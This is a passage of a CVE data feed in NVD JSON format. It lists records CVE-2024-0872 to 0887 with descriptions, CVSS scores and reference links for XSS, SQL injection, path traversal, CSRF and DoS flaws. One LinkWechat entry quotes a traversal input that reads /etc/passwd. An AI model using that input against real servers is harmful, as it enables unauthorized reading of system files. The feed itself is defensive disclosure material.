"CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0872", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3036986/", "name" : "https://plugins.trac.wordpress.org/changeset/3036986/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3036986/", "name" : "https://plugins.trac.wordpress.org/changeset/3036986/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/acc261eb-fafa-4e9d-b7ab-a449f14a7638?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/acc261eb-fafa-4e9d-b7ab-a449f14a7638?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/acc261eb-fafa-4e9d-b7ab-a449f14a7638?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/acc261eb-fafa-4e9d-b7ab-a449f14a7638?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Watu Quiz plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.1 via the watu-userinfo shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive user meta data which can include session tokens and user emails." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.4.1.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-04-07T13:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0873", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3036986/", "name" : "https://plugins.trac.wordpress.org/changeset/3036986/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3036986/", "name" : "https://plugins.trac.wordpress.org/changeset/3036986/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c31732fa-eb35-4932-bee6-08955a14b010?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c31732fa-eb35-4932-bee6-08955a14b010?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c31732fa-eb35-4932-bee6-08955a14b010?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c31732fa-eb35-4932-bee6-08955a14b010?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Watu Quiz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'watu-basic-chart' shortcode in all versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.4.1.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-07-17T17:06Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0874", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0041", "name" : "RHSA-2024:0041", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0041", "name" : "RHSA-2024:0041", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:4850", "name" : "RHSA-2024:4850", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:6009", "name" : "RHSA-2024:6009", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:6406", "name" : "RHSA-2024:6406", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0874", "name" : "https://access.redhat.com/security/cve/CVE-2024-0874", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0874", "name" : "https://access.redhat.com/security/cve/CVE-2024-0874", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2219234", "name" : "RHBZ#2219234", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2219234", "name" : "RHBZ#2219234", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/coredns/coredns/issues/6186", "name" : "https://github.com/coredns/coredns/issues/6186", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/coredns/coredns/issues/6186", "name" : "https://github.com/coredns/coredns/issues/6186", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/coredns/coredns/pull/6354", "name" : "https://github.com/coredns/coredns/pull/6354", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/coredns/coredns/pull/6354", "name" : "https://github.com/coredns/coredns/pull/6354", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-25T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0875", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/openemr/openemr/commit/d141d2ca06fb2171a202c7302dd5d5af8539f255", "name" : "https://github.com/openemr/openemr/commit/d141d2ca06fb2171a202c7302dd5d5af8539f255", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/16cba0fc-748d-4ea8-9573-1f6fbe9a27c9", "name" : "https://huntr.com/bounties/16cba0fc-748d-4ea8-9573-1f6fbe9a27c9", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A stored cross-site scripting (XSS) vulnerability exists in openemr/openemr version 7.0.1. An attacker can inject malicious payloads into the 'inputBody' field in the Secure Messaging feature, which can then be sent to other users. When the recipient views the malicious message, the payload is executed, potentially compromising their account. This issue is fixed in version 7.0.2.1." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:open-emr:openemr:7.0.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-15T11:15Z", "lastModifiedDate" : "2024-11-19T16:03Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0879", "ASSIGNER" : "security@jfrog.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41", "name" : "https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41", "name" : "https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/", "name" : "https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/", "name" : "https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nAuthentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address.\n\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:vector_admin:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024-01-23", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-25T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0880", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md", "name" : "https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md", "name" : "https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252032", "name" : "https://vuldb.com/?ctiid.252032", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252032", "name" : "https://vuldb.com/?ctiid.252032", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252032", "name" : "https://vuldb.com/?id.252032", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252032", "name" : "https://vuldb.com/?id.252032", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:100296:qdbcrm:1.1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-25T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0881", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/", "name" : "https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/", "name" : "https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not have proper authorization, resulting in password protected posts to be displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.76", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-11T16:15Z", "lastModifiedDate" : "2025-05-09T15:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0882", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md", "name" : "https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md", "name" : "https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.252033", "name" : "https://vuldb.com/?ctiid.252033", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252033", "name" : "https://vuldb.com/?ctiid.252033", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252033", "name" : "https://vuldb.com/?id.252033", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252033", "name" : "https://vuldb.com/?id.252033", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in qwdigital LinkWechat 5.1.0. It has been classified as problematic. This affects an unknown part of the file /linkwechat-api/common/download/resource of the component Universal Download Interface. The manipulation of the argument name with the input /profile/../../../../../etc/passwd leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252033 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:linkwechat:linkwechat:5.1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-25T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0883", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://blog.csdn.net/weixin_56393356/article/details/135756616", "name" : "https://blog.csdn.net/weixin_56393356/article/details/135756616", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://blog.csdn.net/weixin_56393356/article/details/135756616", "name" : "https://blog.csdn.net/weixin_56393356/article/details/135756616", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252034", "name" : "https://vuldb.com/?ctiid.252034", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252034", "name" : "https://vuldb.com/?ctiid.252034", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252034", "name" : "https://vuldb.com/?id.252034", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252034", "name" : "https://vuldb.com/?id.252034", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects the function prepare of the file admin/pay.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252034 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:online_tours_\\&_travels_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-25T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0884", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://blog.csdn.net/Q_M_0_9/article/details/135846415", "name" : "https://blog.csdn.net/Q_M_0_9/article/details/135846415", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://blog.csdn.net/Q_M_0_9/article/details/135846415", "name" : "https://blog.csdn.net/Q_M_0_9/article/details/135846415", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.252035", "name" : "https://vuldb.com/?ctiid.252035", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252035", "name" : "https://vuldb.com/?ctiid.252035", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252035", "name" : "https://vuldb.com/?id.252035", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252035", "name" : "https://vuldb.com/?id.252035", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function exec of the file payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252035." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:online_tours_\\&travels_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-25T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0885", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252036", "name" : "https://vuldb.com/?ctiid.252036", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252036", "name" : "https://vuldb.com/?ctiid.252036", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252036", "name" : "https://vuldb.com/?id.252036", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252036", "name" : "https://vuldb.com/?id.252036", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:spycamlizard:spycamlizard:1.230:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-25T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0886", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fitoxs.com/vuldb/09-exploit-perl.txt", "name" : "https://fitoxs.com/vuldb/09-exploit-perl.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://fitoxs.com/vuldb/09-exploit-perl.txt", "name" : "https://fitoxs.com/vuldb/09-exploit-perl.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252037", "name" : "https://vuldb.com/?ctiid.252037", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252037", "name" : "https://vuldb.com/?ctiid.252037", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252037", "name" : "https://vuldb.com/?id.252037", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252037", "name" : "https://vuldb.com/?id.252037", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:poikosoft:ez_cd_audio_converter:8.0.7:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-25T22:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0887", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fitoxs.com/vuldb/18-exploit-perl.txt", "name" : "https://fitoxs.com/vuldb/18-exploit-perl.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://fitoxs.com/vuldb/18-exploit-perl.txt", "name" : "https://fitoxs.com/vuldb/18-exploit-perl.txt", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252038", "name" : "https://vuldb.com/?ctiid.252038", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252038", "name" : "https://vuldb.com/?ctiid.252038", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252038", "name" : "https://vuldb.com/?id.252038", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : 